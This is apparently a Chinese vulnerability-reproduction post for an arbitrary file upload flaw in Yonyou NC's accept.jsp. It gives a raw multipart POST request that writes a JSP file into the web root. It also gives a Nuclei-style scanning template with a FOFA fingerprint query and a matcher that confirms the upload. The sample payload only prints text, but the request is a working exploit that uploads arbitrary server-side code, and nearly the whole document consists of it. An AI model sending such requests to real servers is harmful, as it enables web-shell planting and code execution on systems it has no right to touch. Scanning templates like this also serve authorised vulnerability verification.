「漏洞复现」用友NC accept.jsp任意文件上传漏洞

POST /aim/equipmap/accept.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Cache-Control: max-age=0sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"Cookie: JSESSIONID=B78C500FE3ED18E919992117C5067EB6.serverAccept-Language: zh-CN,zh;q=0.9Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="upload"; filename="config.txt"Content-Type: text/plain<% out.println("hello"); %>-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="fname"webappsnc_webconfig.jsp-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

id: yonyou-nc-accept-fileuploadinfo:  name: 用友NC accept.jsp任意文件上传漏洞  author: rain  severity: critical  description: |    用友NC（NC，用友软件企业管理软件）中存在一个严重漏洞，允许攻击者通过accept.jsp接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件，潜在风险包括远程执行恶意代码、访问敏感数据，以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统，可能导致灾难性后果。  reference:    none  metadata:    verified: true    max-request: 2    fofa-query: icon_hash="1085941792"  tags: yonyou, nc, 文件上传漏洞, 安全漏洞variables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  file_content: "{{to_lower(rand_text_alpha(8))}}"http:  - raw:      - |-        POST /aim/equipmap/accept.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Cache-Control: max-age=0        sec-ch-ua-platform: "Windows"        sec-ch-ua-mobile: ?0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"        Cookie: JSESSIONID=B78C500FE3ED18E919992117C5067EB6.server        Accept-Language: zh-CN,zh;q=0.9        Accept-Encoding: gzip, deflate        Upgrade-Insecure-Requests: 1        Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc        -----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc        Content-Disposition: form-data; name="upload"; filename="{{file_name}}.txt"        Content-Type: text/plain        <% out.println("{{file_content}}"); %>        -----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc        Content-Disposition: form-data; name="fname"        webappsnc_web{{file_name}}.jsp        -----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--      - |        GET /{{file_name}}.jsp HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip    matchers-condition: and    matchers:      - type: dsl        dsl:          - "status_code_2 == 200 && contains(body_2,'{{file_content}}')"